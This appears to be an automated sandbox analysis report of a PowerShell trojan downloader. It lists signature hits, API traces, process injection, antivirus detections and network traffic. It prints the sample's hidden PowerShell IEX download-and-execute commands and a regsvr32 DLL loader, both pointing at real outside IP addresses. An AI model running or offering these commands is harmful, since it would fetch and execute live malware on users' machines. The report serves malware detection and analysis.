description powershell.exe tried to sleep 170 seconds, actually delayed analysis time by 170 seconds
file C:\Users\Public\Videos\trendmicro2.dll
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://108.62.12.61:99/home'))"
cmdline powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://194.5.212.190/load/trendmicro2.dll','C:\users\public\videos\trendmicro2.dll')
cmdline regsvr32 C:\users\public\videos\trendmicro2.dll
cmdline powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://108.62.12.61:80/home2'))"
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 155648
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x07440000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received HTTP/1.1 200 OK Date: Mon, 1 Nov 2021 02:10:59 GMT Server: Apache Content-Length: 199368 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: text/plain
Data received HTTP/1.1 200 OK Date: Mon, 1 Nov 2021 02:10:59 GMT Server: Apache Content-Length: 199408 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: text/plain
Data sent GET /load/trendmicro2.dll HTTP/1.1 Host: 194.5.212.190 Connection: Keep-Alive
Data sent GET /home HTTP/1.1 Host: 108.62.12.61:99 Connection: Keep-Alive
Data sent GET /home2 HTTP/1.1 Host: 108.62.12.61 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
url http://108.62.12.61:99/home
url http://108.62.12.61:80/home2
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Steal credential rule local_credential_Steal
description Communications use DNS rule Network_DNS
description Match Windows Inet API call rule Str_Win32_Internet_API
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Run a KeyLogger rule KeyLogger
description Communications over FTP rule Network_FTP
description Escalate privileges rule Escalate_priviledges
description File Downloader rule Network_Downloader
description Take ScreenShot rule ScreenShot
description Match Windows Http API call rule Str_Win32_Http_API
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
host 108.62.12.61
host 194.5.212.190
Lionic Trojan.Script.Boxter.4!c
Arcabit Heur.BZC.PZQ.Boxter.791.43396F78
ESET-NOD32 PowerShell/TrojanDownloader.Agent.EOA
TrendMicro-HouseCall TROJ_FRS.VSNW1EJ21
BitDefender Heur.BZC.PZQ.Boxter.791.43396F78
MicroWorld-eScan Heur.BZC.PZQ.Boxter.791.43396F78
Ad-Aware Heur.BZC.PZQ.Boxter.791.43396F78
Emsisoft Heur.BZC.PZQ.Boxter.791.43396F78 (B)
Comodo TrojWare.Win32.BadShell.XSP@7pmj0k
TrendMicro TROJ_FRS.VSNW1EJ21
FireEye Heur.BZC.PZQ.Boxter.791.43396F78
Antiy-AVL Trojan/Generic.ASMalwRG.FB
GData Heur.BZC.PZQ.Boxter.791.43396F78
ALYac Heur.BZC.PZQ.Boxter.791.43396F78
MAX malware (ai score=81)
Ikarus Win32.Outbreak
process powershell.exe useragent Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
process regsvr32.exe useragent
Time & API Arguments Status Return Repeated

send

buffer: GET /load/trendmicro2.dll HTTP/1.1 Host: 194.5.212.190 Connection: Keep-Alive
socket: 1412
sent: 83
1 83 0

send

buffer: GET /home HTTP/1.1 Host: 108.62.12.61:99 Connection: Keep-Alive
socket: 1420
sent: 69
1 69 0

send

buffer: GET /home2 HTTP/1.1 Host: 108.62.12.61 Connection: Keep-Alive
socket: 1420
sent: 67
1 67 0
url http://108.62.12.61:99/home
url http://108.62.12.61:80/home2
Process injection Process 2556 resumed a thread in remote process 2840
Process injection Process 2556 resumed a thread in remote process 2988
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000084
suspend_count: 0
process_identifier: 2840
1 0 0

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2988
1 0 0
option -nop value Does not load current user profile
option -w hidden value Attempts to execute command with a hidden window
value Uses powershell to execute a file download from the command line
option -nop value Does not load current user profile
option -w hidden value Attempts to execute command with a hidden window
file C:\Users\Public\Videos\trendmicro2.dll